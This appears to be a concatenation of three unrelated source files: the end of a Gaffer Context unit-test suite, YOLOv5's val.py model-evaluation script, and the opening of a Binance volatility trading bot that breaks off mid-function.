self.assertEqual( c.substitute( "~", IECore.StringAlgo.Substitutions.AllSubstitutions & ~IECore.StringAlgo.Substitutions.TildeSubstitutions ), "~" )
self.assertEqual( c.substitute( "#", IECore.StringAlgo.Substitutions.AllSubstitutions & ~IECore.StringAlgo.Substitutions.FrameSubstitutions ), "#" )
self.assertEqual( c.substitute( "$a/${b}", IECore.StringAlgo.Substitutions.AllSubstitutions & ~IECore.StringAlgo.Substitutions.VariableSubstitutions ), "$a/${b}" )
self.assertEqual( c.substitute( "\\", IECore.StringAlgo.Substitutions.AllSubstitutions & ~IECore.StringAlgo.Substitutions.EscapeSubstitutions ), "\\" )
self.assertEqual( c.substitute( "\\$a", IECore.StringAlgo.Substitutions.AllSubstitutions & ~IECore.StringAlgo.Substitutions.EscapeSubstitutions ), "\\apple" )
self.assertEqual( c.substitute( "#${a}", IECore.StringAlgo.Substitutions.AllSubstitutions & ~IECore.StringAlgo.Substitutions.FrameSubstitutions ), "#apple" )
self.assertEqual( c.substitute( "#${a}", IECore.StringAlgo.Substitutions.NoSubstitutions ), "#${a}" )
def testFrameAndVariableSubstitutionsAreDifferent( self ) :
c = Gaffer.Context()
c.setFrame( 3 )
# Turning off variable substitutions should have no effect on '#' substitutions.
self.assertEqual( c.substitute( "###.$frame" ), "003.3" )
self.assertEqual( c.substitute( "###.$frame", IECore.StringAlgo.Substitutions.AllSubstitutions & ~IECore.StringAlgo.Substitutions.VariableSubstitutions ), "003.$frame" )
# Turning off '#' substitutions should have no effect on variable substitutions.
self.assertEqual( c.substitute( "###.$frame" ), "003.3" )
self.assertEqual( c.substitute( "###.$frame", IECore.StringAlgo.Substitutions.AllSubstitutions & ~IECore.StringAlgo.Substitutions.FrameSubstitutions ), "###.3" )
def testInternedStringVectorDataSubstitutions( self ) :
c = Gaffer.Context()
c["test1"] = IECore.InternedStringVectorData( [ "a", "b" ] )
c["test2"] = IECore.InternedStringVectorData()
self.assertEqual( c.substitute( "${test1}" ), "/a/b" )
self.assertEqual( c.substitute( "${test2}" ), "/" )
def testNames( self ) :
c = Gaffer.Context()
self.assertEqual( set( c.names() ), set( [ "frame", "framesPerSecond" ] ) )
c["a"] = 10
self.assertEqual( set( c.names() ), set( [ "frame", "framesPerSecond", "a" ] ) )
cc = Gaffer.Context( c )
self.assertEqual( set( cc.names() ), set( [ "frame", "framesPerSecond", "a" ] ) )
cc["b"] = 20
self.assertEqual( set( cc.names() ), set( [ "frame", "framesPerSecond", "a", "b" ] ) )
self.assertEqual( set( c.names() ), set( [ "frame", "framesPerSecond", "a" ] ) )
self.assertEqual( cc.names(), cc.keys() )
@GafferTest.TestRunner.PerformanceTestMethod()
def testManyContexts( self ) :
GafferTest.testManyContexts()
def testGetWithAndWithoutCopying( self ) :
c = Gaffer.Context()
c["test"] = IECore.IntVectorData( [ 1, 2 ] )
# we should be getting a copy each time by default
self.assertFalse( c["test"].isSame( c["test"] ) )
# meaning that if we modify the returned value, no harm is done
c["test"].append( 10 )
self.assertEqual( c["test"], IECore.IntVectorData( [ 1, 2 ] ) )
# if we ask nicely, we can get a reference to the internal
# value without any copying.
self.assertTrue( c.get( "test", _copy=False ).isSame( c.get( "test", _copy=False ) ) )
# but then if we modify the returned value, we are changing the
# context itself too. this should be avoided - we're just doing it
# here to test that we are indeed referencing the internal value.
c.get( "test", _copy=False ).append( 10 )
self.assertEqual( c["test"], IECore.IntVectorData( [ 1, 2, 10 ] ) )
def testGetWithDefaultAndCopyArgs( self ) :
c = Gaffer.Context()
c["test"] = IECore.IntVectorData( [ 1, 2 ] )
self.assertTrue( c.get( "test", 10, _copy=False ).isSame( c.get( "test", 20, _copy=False ) ) )
self.assertTrue( c.get( "test", defaultValue=10, _copy=False ).isSame( c.get( "test", defaultValue=20, _copy=False ) ) )
def testCopyWithSharedOwnership( self ) :
c1 = Gaffer.Context()
c1["testInt"] = 10
c1["testIntVector"] = IECore.IntVectorData( [ 10 ] )
self.assertEqual( c1["testInt"], 10 )
self.assertEqual( c1["testIntVector"], IECore.IntVectorData( [ 10 ] ) )
r = c1.get( "testIntVector", _copy=False ).refCount()
c2 = Gaffer.Context( c1, ownership = Gaffer.Context.Ownership.Shared )
self.assertEqual( c2["testInt"], 10 )
self.assertEqual( c2["testIntVector"], IECore.IntVectorData( [ 10 ] ) )
c1["testInt"] = 20
self.assertEqual( c1["testInt"], 20 )
# c2 has changed too! with slightly improved performance comes
# great responsibility!
self.assertEqual( c2["testInt"], 20 )
# both contexts reference the same object, but c2 at least owns
# a reference to its values, and can be used after c1 has been
# deleted.
self.assertTrue( c2.get( "testIntVector", _copy=False ).isSame( c1.get( "testIntVector", _copy=False ) ) )
self.assertEqual( c2.get( "testIntVector", _copy=False ).refCount(), r + 1 )
del c1
self.assertEqual( c2["testInt"], 20 )
self.assertEqual( c2["testIntVector"], IECore.IntVectorData( [ 10 ] ) )
self.assertEqual( c2.get( "testIntVector", _copy=False ).refCount(), r )
def testCopyWithBorrowedOwnership( self ) :
c1 = Gaffer.Context()
c1["testInt"] = 10
c1["testIntVector"] = IECore.IntVectorData( [ 10 ] )
self.assertEqual( c1["testInt"], 10 )
self.assertEqual( c1["testIntVector"], IECore.IntVectorData( [ 10 ] ) )
r = c1.get( "testIntVector", _copy=False ).refCount()
c2 = Gaffer.Context( c1, ownership = Gaffer.Context.Ownership.Borrowed )
self.assertEqual( c2["testInt"], 10 )
self.assertEqual( c2["testIntVector"], IECore.IntVectorData( [ 10 ] ) )
c1["testInt"] = 20
self.assertEqual( c1["testInt"], 20 )
# c2 has changed too! with slightly improved performance comes
# great responsibility!
self.assertEqual( c2["testInt"], 20 )
# check that c2 doesn't own a reference
self.assertTrue( c2.get( "testIntVector", _copy=False ).isSame( c1.get( "testIntVector", _copy=False ) ) )
self.assertEqual( c2.get( "testIntVector", _copy=False ).refCount(), r )
# make sure we delete c2 before we delete c1
del c2
# check that we're ok to access c1 after deleting c2
self.assertEqual( c1["testInt"], 20 )
self.assertEqual( c1["testIntVector"], IECore.IntVectorData( [ 10 ] ) )
def testSetOnBorrowedContextsDoesntAffectOriginal( self ) :
c1 = Gaffer.Context()
c1["testInt"] = 10
c1["testIntVector"] = IECore.IntVectorData( [ 10 ] )
c2 = Gaffer.Context( c1, ownership = Gaffer.Context.Ownership.Borrowed )
c2["testInt"] = 20
c2["testIntVector"] = IECore.IntVectorData( [ 20 ] )
self.assertEqual( c1["testInt"], 10 )
self.assertEqual( c1["testIntVector"], IECore.IntVectorData( [ 10 ] ) )
self.assertEqual( c2["testInt"], 20 )
self.assertEqual( c2["testIntVector"], IECore.IntVectorData( [ 20 ] ) )
def testSetOnSharedContextsDoesntAffectOriginal( self ) :
c1 = Gaffer.Context()
c1["testInt"] = 10
c1["testIntVector"] = IECore.IntVectorData( [ 10 ] )
c2 = Gaffer.Context( c1, ownership = Gaffer.Context.Ownership.Shared )
c2["testInt"] = 20
c2["testIntVector"] = IECore.IntVectorData( [ 20 ] )
self.assertEqual( c1["testInt"], 10 )
self.assertEqual( c1["testIntVector"], IECore.IntVectorData( [ 10 ] ) )
self.assertEqual( c2["testInt"], 20 )
self.assertEqual( c2["testIntVector"], IECore.IntVectorData( [ 20 ] ) )
def testSetOnSharedContextsReleasesReference( self ) :
c1 = Gaffer.Context()
c1["testIntVector"] = IECore.IntVectorData( [ 10 ] )
r = c1.get( "testIntVector", _copy=False ).refCount()
c2 = Gaffer.Context( c1, ownership = Gaffer.Context.Ownership.Shared )
c2["testIntVector"] = IECore.IntVectorData( [ 20 ] )
self.assertEqual( c1.get( "testIntVector", _copy=False ).refCount(), r )
def testHash( self ) :
c = Gaffer.Context()
hashes = [ c.hash() ]
c["test"] = 1
hashes.append( c.hash() )
c["test"] = 2
hashes.append( c.hash() )
c["test2"] = "test2"
hashes.append( c.hash() )
self.assertEqual( len( hashes ), 4 )
self.assertEqual( len( set( str( h ) for h in hashes ) ), len( hashes ) )
c["test2"] = "test2" # no change
self.assertEqual( c.hash(), hashes[-1] )
def testChanged( self ) :
c = Gaffer.Context()
c["test"] = IECore.StringVectorData( [ "one" ] )
h = c.hash()
cs = GafferTest.CapturingSlot( c.changedSignal() )
d = c.get( "test", _copy = False ) # dangerous! the context won't know if we make changes
d.append( "two" )
self.assertEqual( c.get( "test" ), IECore.StringVectorData( [ "one", "two" ] ) )
self.assertEqual( len( cs ), 0 )
c.changed( "test" ) # let the context know what we've been up to
self.assertEqual( len( cs ), 1 )
self.assertEqual( cs[0], ( c, "test" ) )
self.assertNotEqual( c.hash(), h )
def testHashIgnoresUIEntries( self ) :
c = Gaffer.Context()
h = c.hash()
c["ui:test"] = 1
self.assertEqual( h, c.hash() )
@GafferTest.TestRunner.PerformanceTestMethod()
def testManySubstitutions( self ) :
GafferTest.testManySubstitutions()
@GafferTest.TestRunner.PerformanceTestMethod()
def testManyEnvironmentSubstitutions( self ) :
GafferTest.testManyEnvironmentSubstitutions()
def testEscapedSubstitutions( self ) :
c = Gaffer.Context()
c.setFrame( 20 )
c["a"] = "apple"
c["b"] = "bear"
self.assertEqual( c.substitute( r"\${a}.\$b" ), "${a}.$b" )
self.assertEqual( c.substitute( r"\~" ), "~" )
self.assertEqual( c.substitute( r"\#\#\#\#" ), "####" )
# really we're passing \\ to substitute and getting back \ -
# the extra slashes are escaping for the python interpreter.
self.assertEqual( c.substitute( "\\\\" ), "\\" )
self.assertEqual( c.substitute( "\\" ), "" )
def testRemove( self ) :
c = Gaffer.Context()
c["a"] = "apple"
c["b"] = "bear"
c["c"] = "cat"
h = c.hash()
self.assertEqual( set( c.names() ), set( [ "a", "b", "c", "frame", "framesPerSecond" ] ) )
# test Context.remove()
c.remove( "a" )
self.assertNotEqual( c.hash(), h )
self.assertEqual( set( c.names() ), set( [ "b", "c", "frame", "framesPerSecond" ] ) )
h = c.hash()
# test Context.__delitem__()
del c[ "c" ]
self.assertNotEqual( c.hash(), h )
self.assertEqual( set( c.names() ), set( [ "b", "frame", "framesPerSecond" ] ) )
self.assertEqual( c["b"], "bear" )
def testRemoveMatching( self ) :
c = Gaffer.Context()
c["a_1"] = "apple"
c["a_2"] = "apple"
c["b_1"] = "bear"
c["b_2"] = "bear"
c["c_1"] = "cat"
c["c_2"] = "cat"
h = c.hash()
self.assertEqual( set( c.names() ), set( [ "a_1", "a_2", "b_1", "b_2", "c_1", "c_2", "frame", "framesPerSecond" ] ) )
# test Context.removeMatching()
c.removeMatching( "a* c*" )
self.assertNotEqual( c.hash(), h )
self.assertEqual( set( c.names() ), set( [ "b_1", "b_2", "frame", "framesPerSecond" ] ) )
h = c.hash()
def testContains( self ) :
c = Gaffer.Context()
self.assertFalse( "a" in c )
self.assertTrue( "a" not in c )
c["a"] = 1
self.assertTrue( "a" in c )
self.assertFalse( "a" not in c )
del c["a"]
self.assertFalse( "a" in c )
self.assertTrue( "a" not in c )
def testTime( self ) :
c = Gaffer.Context()
self.assertEqual( c.getFrame(), 1.0 )
self.assertEqual( c.getFramesPerSecond(), 24.0 )
self.assertAlmostEqual( c.getTime(), 1.0 / 24.0 )
c.setFrame( 12.0 )
self.assertEqual( c.getFrame(), 12.0 )
self.assertEqual( c.getFramesPerSecond(), 24.0 )
self.assertAlmostEqual( c.getTime(), 12.0 / 24.0 )
c.setFramesPerSecond( 48.0 )
self.assertEqual( c.getFrame(), 12.0 )
self.assertEqual( c.getFramesPerSecond(), 48.0 )
self.assertAlmostEqual( c.getTime(), 12.0 / 48.0 )
def testEditableScope( self ) :
GafferTest.testEditableScope()
def testCanceller( self ) :
c = Gaffer.Context()
c["test"] = 1
self.assertEqual( c.canceller(), None )
canceller = IECore.Canceller()
cc = Gaffer.Context( c, canceller )
self.assertEqual( cc["test"], 1 )
self.assertTrue( cc.canceller() is not None )
canceller.cancel()
with self.assertRaises( IECore.Cancelled ) :
IECore.Canceller.check( cc.canceller() )
if __name__ == "__main__":
unittest.main()
|
val.py
|
"""Validate a trained YOLOv5 model accuracy on a custom dataset
Usage:
$ python path/to/val.py --data coco128.yaml --weights yolov5s.pt --img 640
"""
import argparse
import json
import os
import sys
from pathlib import Path
from threading import Thread
import numpy as np
import torch
import yaml
from tqdm import tqdm
FILE = Path(__file__).absolute()
sys.path.append(FILE.parents[0].as_posix()) # add yolov5/ to path
from models.experimental import attempt_load
from utils.datasets import create_dataloader
from utils.general import coco80_to_coco91_class, check_dataset, check_file, check_img_size, check_requirements, \
box_iou, non_max_suppression, scale_coords, xyxy2xywh, xywh2xyxy, set_logging, increment_path, colorstr
from utils.metrics import ap_per_class, ConfusionMatrix
from utils.plots import plot_images, output_to_target, plot_study_txt
from utils.torch_utils import select_device, time_sync
from utils.loggers import Loggers
def save_one_txt(predn, save_conf, shape, file):
# Save one txt result
gn = torch.tensor(shape)[[1, 0, 1, 0]] # normalization gain whwh
for *xyxy, conf, cls in predn.tolist():
xywh = (xyxy2xywh(torch.tensor(xyxy).view(1, 4)) / gn).view(-1).tolist() # normalized xywh
line = (cls, *xywh, conf) if save_conf else (cls, *xywh) # label format
with open(file, 'a') as f:
f.write(('%g ' * len(line)).rstrip() % line + '\n')
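# Illustrative output line (values assumed): for class 0, a centred box covering
# half the image in each dimension and confidence 0.9 with save_conf=True, the
# written line would be "0 0.5 0.5 0.5 0.5 0.9".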
def save_one_json(predn, jdict, path, class_map):
# Save one JSON result {"image_id": 42, "category_id": 18, "bbox": [258.15, 41.29, 348.26, 243.78], "score": 0.236}
image_id = int(path.stem) if path.stem.isnumeric() else path.stem
box = xyxy2xywh(predn[:, :4]) # xywh
box[:, :2] -= box[:, 2:] / 2 # xy center to top-left corner
for p, b in zip(predn.tolist(), box.tolist()):
jdict.append({'image_id': image_id,
'category_id': class_map[int(p[5])],
'bbox': [round(x, 3) for x in b],
'score': round(p[4], 5)})
def process_batch(predictions, labels, iouv):
# Evaluate 1 batch of predictions
correct = torch.zeros(predictions.shape[0], len(iouv), dtype=torch.bool, device=iouv.device)
detected = [] # label indices
tcls, pcls = labels[:, 0], predictions[:, 5]
nl = labels.shape[0] # number of labels
for cls in torch.unique(tcls):
ti = (cls == tcls).nonzero(as_tuple=False).view(-1) # label indices
pi = (cls == pcls).nonzero(as_tuple=False).view(-1) # prediction indices
if pi.shape[0]: # find detections
ious, i = box_iou(predictions[pi, 0:4], labels[ti, 1:5]).max(1) # best ious, indices
detected_set = set()
for j in (ious > iouv[0]).nonzero():
d = ti[i[j]] # detected label
if d.item() not in detected_set:
detected_set.add(d.item())
detected.append(d) # append detections
correct[pi[j]] = ious[j] > iouv # iou_thres is 1xn
if len(detected) == nl: # all labels already located in image
break
return correct
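# Expected shapes (for reference): predictions is an (N, 6) tensor of
# [x1, y1, x2, y2, conf, cls] rows, labels is an (M, 5) tensor of
# [cls, x1, y1, x2, y2] rows, and iouv is the (K,) IoU threshold vector
# (K = 10 in run()); the returned `correct` is an (N, K) boolean tensor.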
@torch.no_grad()
def run(data,
weights=None, # model.pt path(s)
batch_size=32, # batch size
imgsz=640, # inference size (pixels)
conf_thres=0.001, # confidence threshold
iou_thres=0.6, # NMS IoU threshold
task='val', # train, val, test, speed or study
device='', # cuda device, i.e. 0 or 0,1,2,3 or cpu
single_cls=False, # treat as single-class dataset
augment=False, # augmented inference
verbose=False, # verbose output
save_txt=False, # save results to *.txt
save_hybrid=False, # save label+prediction hybrid results to *.txt
save_conf=False, # save confidences in --save-txt labels
save_json=False, # save a COCO-JSON results file
project='runs/val', # save to project/name
name='exp', # save to project/name
exist_ok=False, # existing project/name ok, do not increment
half=True, # use FP16 half-precision inference
model=None,
dataloader=None,
save_dir=Path(''),
plots=True,
loggers=Loggers(),
compute_loss=None,
):
# Initialize/load model and set device
training = model is not None
if training: # called by train.py
device = next(model.parameters()).device # get model device
else: # called directly
device = select_device(device, batch_size=batch_size)
# Directories
save_dir = increment_path(Path(project) / name, exist_ok=exist_ok) # increment run
(save_dir / 'labels' if save_txt else save_dir).mkdir(parents=True, exist_ok=True) # make dir
# Load model
model = attempt_load(weights, map_location=device) # load FP32 model
gs = max(int(model.stride.max()), 32) # grid size (max stride)
imgsz = check_img_size(imgsz, s=gs) # check image size
# Multi-GPU disabled, incompatible with .half() https://github.com/ultralytics/yolov5/issues/99
# if device.type != 'cpu' and torch.cuda.device_count() > 1:
# model = nn.DataParallel(model)
# Data
with open(data) as f:
data = yaml.safe_load(f)
check_dataset(data) # check
# Half
half &= device.type != 'cpu' # half precision only supported on CUDA
if half:
model.half()
# Configure
model.eval()
is_coco = type(data['val']) is str and data['val'].endswith('coco/val2017.txt') # COCO dataset
nc = 1 if single_cls else int(data['nc']) # number of classes
iouv = torch.linspace(0.5, 0.95, 10).to(device) # iou vector for mAP@0.5:0.95
niou = iouv.numel()
# Dataloader
if not training:
if device.type != 'cpu':
model(torch.zeros(1, 3, imgsz, imgsz).to(device).type_as(next(model.parameters()))) # run once
task = task if task in ('train', 'val', 'test') else 'val' # path to train/val/test images
dataloader = create_dataloader(data[task], imgsz, batch_size, gs, single_cls, pad=0.5, rect=True,
prefix=colorstr(f'{task}: '))[0]
seen = 0
confusion_matrix = ConfusionMatrix(nc=nc)
names = {k: v for k, v in enumerate(model.names if hasattr(model, 'names') else model.module.names)}
class_map = coco80_to_coco91_class() if is_coco else list(range(1000))
s = ('%20s' + '%11s' * 6) % ('Class', 'Images', 'Labels', 'P', 'R', 'mAP@.5', 'mAP@.5:.95')
p, r, f1, mp, mr, map50, map, t0, t1, t2 = 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.
loss = torch.zeros(3, device=device)
jdict, stats, ap, ap_class = [], [], [], []
for batch_i, (img, targets, paths, shapes) in enumerate(tqdm(dataloader, desc=s)):
t_ = time_sync()
img = img.to(device, non_blocking=True)
img = img.half() if half else img.float() # uint8 to fp16/32
img /= 255.0 # 0 - 255 to 0.0 - 1.0
targets = targets.to(device)
nb, _, height, width = img.shape # batch size, channels, height, width
t = time_sync()
t0 += t - t_
# Run model
out, train_out = model(img, augment=augment) # inference and training outputs
t1 += time_sync() - t
# Compute loss
if compute_loss:
loss += compute_loss([x.float() for x in train_out], targets)[1] # box, obj, cls
# Run NMS
targets[:, 2:] *= torch.Tensor([width, height, width, height]).to(device) # to pixels
lb = [targets[targets[:, 0] == i, 1:] for i in range(nb)] if save_hybrid else [] # for autolabelling
t = time_sync()
out = non_max_suppression(out, conf_thres, iou_thres, labels=lb, multi_label=True, agnostic=single_cls)
t2 += time_sync() - t
# Statistics per image
for si, pred in enumerate(out):
labels = targets[targets[:, 0] == si, 1:]
nl = len(labels)
tcls = labels[:, 0].tolist() if nl else [] # target class
path, shape = Path(paths[si]), shapes[si][0]
seen += 1
if len(pred) == 0:
if nl:
stats.append((torch.zeros(0, niou, dtype=torch.bool), torch.Tensor(), torch.Tensor(), tcls))
continue
# Predictions
if single_cls:
pred[:, 5] = 0
predn = pred.clone()
scale_coords(img[si].shape[1:], predn[:, :4], shape, shapes[si][1]) # native-space pred
# Evaluate
if nl:
tbox = xywh2xyxy(labels[:, 1:5]) # target boxes
scale_coords(img[si].shape[1:], tbox, shape, shapes[si][1]) # native-space labels
labelsn = torch.cat((labels[:, 0:1], tbox), 1) # native-space labels
correct = process_batch(predn, labelsn, iouv)
if plots:
confusion_matrix.process_batch(predn, labelsn)
else:
correct = torch.zeros(pred.shape[0], niou, dtype=torch.bool)
stats.append((correct.cpu(), pred[:, 4].cpu(), pred[:, 5].cpu(), tcls)) # (correct, conf, pcls, tcls)
# Save/log
if save_txt:
save_one_txt(predn, save_conf, shape, file=save_dir / 'labels' / (path.stem + '.txt'))
if save_json:
save_one_json(predn, jdict, path, class_map) # append to COCO-JSON dictionary
loggers.on_val_batch_end(pred, predn, path, names, img[si])
# Plot images
if plots and batch_i < 3:
f = save_dir / f'val_batch{batch_i}_labels.jpg' # labels
Thread(target=plot_images, args=(img, targets, paths, f, names), daemon=True).start()
f = save_dir / f'val_batch{batch_i}_pred.jpg' # predictions
Thread(target=plot_images, args=(img, output_to_target(out), paths, f, names), daemon=True).start()
# Compute statistics
stats = [np.concatenate(x, 0) for x in zip(*stats)] # to numpy
if len(stats) and stats[0].any():
p, r, ap, f1, ap_class = ap_per_class(*stats, plot=plots, save_dir=save_dir, names=names)
ap50, ap = ap[:, 0], ap.mean(1) # AP@0.5, AP@0.5:0.95
mp, mr, map50, map = p.mean(), r.mean(), ap50.mean(), ap.mean()
nt = np.bincount(stats[3].astype(np.int64), minlength=nc) # number of targets per class
else:
nt = torch.zeros(1)
# Print results
pf = '%20s' + '%11i' * 2 + '%11.3g' * 4 # print format
print(pf % ('all', seen, nt.sum(), mp, mr, map50, map))
# Print results per class
if (verbose or (nc < 50 and not training)) and nc > 1 and len(stats):
for i, c in enumerate(ap_class):
print(pf % (names[c], seen, nt[c], p[i], r[i], ap50[i], ap[i]))
# Print speeds
t = tuple(x / seen * 1E3 for x in (t0, t1, t2)) # speeds per image
if not training:
shape = (batch_size, 3, imgsz, imgsz)
print(f'Speed: %.1fms pre-process, %.1fms inference, %.1fms NMS per image at shape {shape}' % t)
# Plots
if plots:
confusion_matrix.plot(save_dir=save_dir, names=list(names.values()))
loggers.on_val_end()
# Save JSON
if save_json and len(jdict):
w = Path(weights[0] if isinstance(weights, list) else weights).stem if weights is not None else '' # weights
anno_json = str(Path(data.get('path', '../coco')) / 'annotations/instances_val2017.json') # annotations json
pred_json = str(save_dir / f"{w}_predictions.json") # predictions json
print(f'\nEvaluating pycocotools mAP... saving {pred_json}...')
with open(pred_json, 'w') as f:
json.dump(jdict, f)
try: # https://github.com/cocodataset/cocoapi/blob/master/PythonAPI/pycocoEvalDemo.ipynb
check_requirements(['pycocotools'])
from pycocotools.coco import COCO
from pycocotools.cocoeval import COCOeval
anno = COCO(anno_json) # init annotations api
pred = anno.loadRes(pred_json) # init predictions api
eval = COCOeval(anno, pred, 'bbox')
if is_coco:
eval.params.imgIds = [int(Path(x).stem) for x in dataloader.dataset.img_files] # image IDs to evaluate
eval.evaluate()
eval.accumulate()
eval.summarize()
map, map50 = eval.stats[:2] # update results (mAP@0.5:0.95, mAP@0.5)
except Exception as e:
print(f'pycocotools unable to run: {e}')
# Return results
model.float() # for training
if not training:
s = f"\n{len(list(save_dir.glob('labels/*.txt')))} labels saved to {save_dir / 'labels'}" if save_txt else ''
print(f"Results saved to {save_dir}{s}")
maps = np.zeros(nc) + map
for i, c in enumerate(ap_class):
maps[c] = ap[i]
return (mp, mr, map50, map, *(loss.cpu() / len(dataloader)).tolist()), maps, t
def parse_opt():
parser = argparse.ArgumentParser(prog='val.py')
parser.add_argument('--data', type=str, default='data/coco128.yaml', help='dataset.yaml path')
parser.add_argument('--weights', nargs='+', type=str, default='yolov5s.pt', help='model.pt path(s)')
parser.add_argument('--batch-size', type=int, default=32, help='batch size')
parser.add_argument('--imgsz', '--img', '--img-size', type=int, default=640, help='inference size (pixels)')
parser.add_argument('--conf-thres', type=float, default=0.001, help='confidence threshold')
parser.add_argument('--iou-thres', type=float, default=0.6, help='NMS IoU threshold')
parser.add_argument('--task', default='val', help='train, val, test, speed or study')
parser.add_argument('--device', default='', help='cuda device, i.e. 0 or 0,1,2,3 or cpu')
parser.add_argument('--single-cls', action='store_true', help='treat as single-class dataset')
parser.add_argument('--augment', action='store_true', help='augmented inference')
parser.add_argument('--verbose', action='store_true', help='report mAP by class')
parser.add_argument('--save-txt', action='store_true', help='save results to *.txt')
parser.add_argument('--save-hybrid', action='store_true', help='save label+prediction hybrid results to *.txt')
parser.add_argument('--save-conf', action='store_true', help='save confidences in --save-txt labels')
parser.add_argument('--save-json', action='store_true', help='save a COCO-JSON results file')
parser.add_argument('--project', default='runs/val', help='save to project/name')
parser.add_argument('--name', default='exp', help='save to project/name')
parser.add_argument('--exist-ok', action='store_true', help='existing project/name ok, do not increment')
parser.add_argument('--half', action='store_true', help='use FP16 half-precision inference')
opt = parser.parse_args()
opt.save_json |= opt.data.endswith('coco.yaml')
opt.save_txt |= opt.save_hybrid
opt.data = check_file(opt.data) # check file
return opt
def main(opt):
set_logging()
print(colorstr('val: ') + ', '.join(f'{k}={v}' for k, v in vars(opt).items()))
check_requirements(exclude=('tensorboard', 'thop'))
if opt.task in ('train', 'val', 'test'): # run normally
run(**vars(opt))
elif opt.task == 'speed': # speed benchmarks
for w in opt.weights if isinstance(opt.weights, list) else [opt.weights]:
run(opt.data, weights=w, batch_size=opt.batch_size, imgsz=opt.imgsz, conf_thres=.25, iou_thres=.45,
save_json=False, plots=False)
elif opt.task == 'study': # run over a range of settings and save/plot
# python val.py --task study --data coco.yaml --iou 0.7 --weights yolov5s.pt yolov5m.pt yolov5l.pt yolov5x.pt
x = list(range(256, 1536 + 128, 128)) # x axis (image sizes)
for w in opt.weights if isinstance(opt.weights, list) else [opt.weights]:
f = f'study_{Path(opt.data).stem}_{Path(w).stem}.txt' # filename to save to
y = [] # y axis
for i in x: # img-size
print(f'\nRunning {f} point {i}...')
r, _, t = run(opt.data, weights=w, batch_size=opt.batch_size, imgsz=i, conf_thres=opt.conf_thres,
iou_thres=opt.iou_thres, save_json=opt.save_json, plots=False)
y.append(r + t) # results and times
np.savetxt(f, y, fmt='%10.4g') # save
os.system('zip -r study.zip study_*.txt')
plot_study_txt(x=x) # plot
if __name__ == "__main__":
opt = parse_opt()
main(opt)
|
sltrx.py
|
import os
import math
import sys
import telegram_send
import threading
import importlib
import glob
from colorama import init
init()
from binance.client import Client
from binance.exceptions import BinanceAPIException
from requests.exceptions import ReadTimeout, ConnectionError
from datetime import date, datetime, timedelta
import time
from itertools import count
import json
from helpers.parameters import (
parse_args, load_config
)
from helpers.handle_creds import (
load_correct_creds, test_api_key
)
class txcolors:
BUY = '\033[92m'
WARNING = '\033[93m'
SELL_LOSS = '\033[91m'
SELL_PROFIT = '\033[32m'
DIM = '\033[2m\033[35m'
DEFAULT = '\033[39m'
# tracks profit/loss each session
global session_profit
session_profit = 0
# print with timestamps
old_out = sys.stdout
class St_ampe_dOut:
"""Stamped stdout."""
nl = True
def write(self, x):
"""Write function overloaded."""
if x == '\n':
old_out.write(x)
self.nl = True
elif self.nl:
old_out.write(f'{txcolors.DIM}[{str(datetime.now().replace(microsecond=0))}]{txcolors.DEFAULT} {x}')
self.nl = False
else:
old_out.write(x)
def flush(self):
pass
sys.stdout = St_ampe_dOut()
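# From here on every print() line is prefixed with a dimmed timestamp, e.g.
# (illustrative): "[2021-07-01 12:00:00] Working...Session profit:0.00%"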
def get_price(add_to_historical=True):
'''Return the current price for all coins on binance'''
global historical_prices, hsp_head
initial_price = {}
prices = client.get_all_tickers()
for coin in prices:
if CUSTOM_LIST:
if any(item + PAIR_WITH == coin['symbol'] for item in tickers) and all(item not in coin['symbol'] for item in FIATS):
initial_price[coin['symbol']] = { 'price': coin['price'], 'time': datetime.now()}
else:
if PAIR_WITH in coin['symbol'] and all(item not in coin['symbol'] for item in FIATS):
initial_price[coin['symbol']] = { 'price': coin['price'], 'time': datetime.now()}
if add_to_historical:
hsp_head += 1
if hsp_head == RECHECK_INTERVAL:
hsp_head = 0
historical_prices[hsp_head] = initial_price
return initial_price
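# Illustrative return value (prices assumed):
# {'TRXUSDT': {'price': '0.08100000', 'time': datetime(2021, 7, 1, 12, 0, 0)}, ...}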
def wait_for_price():
'''calls the initial price and ensures the correct amount of time has passed
before reading the current price again'''
global historical_prices, hsp_head, volatility_cooloff
volatile_coins = {}
externals = {}
coins_up = 0
coins_down = 0
coins_unchanged = 0
pause_bot()
if historical_prices[hsp_head]['TRX' + PAIR_WITH]['time'] > datetime.now() - timedelta(minutes=float(TIME_DIFFERENCE / RECHECK_INTERVAL)):
# sleep for exactly the amount of time required
time.sleep((timedelta(minutes=float(TIME_DIFFERENCE / RECHECK_INTERVAL)) - (datetime.now() - historical_prices[hsp_head]['TRX' + PAIR_WITH]['time'])).total_seconds())
print(f'Working...Session profit:{session_profit:.2f}% ')
# retrieve the latest prices
get_price()
# calculate the difference in prices
for coin in historical_prices[hsp_head]:
# minimum and maximum prices over time period
min_price = min(historical_prices, key = lambda x: float("inf") if x is None else float(x[coin]['price']))
max_price = max(historical_prices, key = lambda x: -1 if x is None else float(x[coin]['price']))
threshold_check = (-1.0 if min_price[coin]['time'] > max_price[coin]['time'] else 1.0) * (float(max_price[coin]['price']) - float(min_price[coin]['price'])) / float(min_price[coin]['price']) * 100
# each coin whose price change crosses our CHANGE_IN_PRICE threshold is added to the volatile_coins dict, provided MAX_COINS has not been reached.
if threshold_check < CHANGE_IN_PRICE:
coins_up +=1
if coin not in volatility_cooloff:
volatility_cooloff[coin] = datetime.now() - timedelta(minutes=TIME_DIFFERENCE)
# only include coin as volatile if it hasn't been picked up in the last TIME_DIFFERENCE minutes already
if datetime.now() >= volatility_cooloff[coin] + timedelta(minutes=TIME_DIFFERENCE):
volatility_cooloff[coin] = datetime.now()
if len(coins_bought) + len(volatile_coins) < MAX_COINS or MAX_COINS == 0:
volatile_coins[coin] = round(threshold_check, 3)
print(f'{coin} has gained - {volatile_coins[coin]}% within the last {TIME_DIFFERENCE} minutes, calculating volume in {PAIR_WITH}')
else:
print(f'{txcolors.WARNING}{coin} has gained - {round(threshold_check, 3)}% within the last {TIME_DIFFERENCE} minutes, but you are holding max number of coins{txcolors.DEFAULT}')
elif threshold_check > CHANGE_IN_PRICE:
coins_down +=1
else:
coins_unchanged +=1
# Here goes new code for external signalling
externals = external_signals()
exnumber = 0
for excoin in externals:
if excoin not in volatile_coins and excoin not in coins_bought and \
(len(coins_bought) + exnumber + len(volatile_coins)) < MAX_COINS:
volatile_coins[excoin] = 1
exnumber +=1
print(f'External signal received on {excoin}, calculating volume in {PAIR_WITH}')
return volatile_coins, len(volatile_coins), historical_prices[hsp_head]
def external_signals():
external_list = {}
signals = {}
